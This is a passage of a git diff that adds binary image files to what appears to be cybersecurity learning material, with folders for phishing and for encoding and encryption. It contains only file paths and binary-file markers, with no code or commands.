b/assets/images/cyber_security_landscape/3_phishing/image-5.png new file mode 100644 index 0000000..81ab092 Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-5.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-6.png b/assets/images/cyber_security_landscape/3_phishing/image-6.png new file mode 100644 index 0000000..262943c Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-6.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-7.png b/assets/images/cyber_security_landscape/3_phishing/image-7.png new file mode 100644 index 0000000..4e20f8d Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-7.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-8.png b/assets/images/cyber_security_landscape/3_phishing/image-8.png new file mode 100644 index 0000000..8fc3703 Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-8.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-9.png b/assets/images/cyber_security_landscape/3_phishing/image-9.png new file mode 100644 index 0000000..e5aeeb9 Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-9.png differ diff --git a/assets/images/cyber_security_landscape/4_encoding_encryption/image-2.png b/assets/images/cyber_security_landscape/4_encoding_encryption/image-2.png new file mode 100644 index 0000000..cd6e095 Binary files /dev/null and b/assets/images/cyber_security_landscape/4_encoding_encryption/image-2.png differ diff --git a/assets/images/cyber_security_landscape/4_encoding_encryption/image-3.png b/assets/images/cyber_security_landscape/4_encoding_encryption/image-3.png new file mode 100644 index 0000000..e8c9fa0 Binary files /dev/null and b/assets/images/cyber_security_landscape/4_encoding_encryption/image-3.png differ diff --git a/assets/images/cyber_security_landscape/4_encoding_encryption/image-4.png b/assets/images/cyber_security_landscape/4_encoding_encryption/image-4.png new file mode 100644 index 0000000..2556d6b Binary files /dev/null and b/assets/images/cyber_security_landscape/4_encoding_encryption/image-4.png differ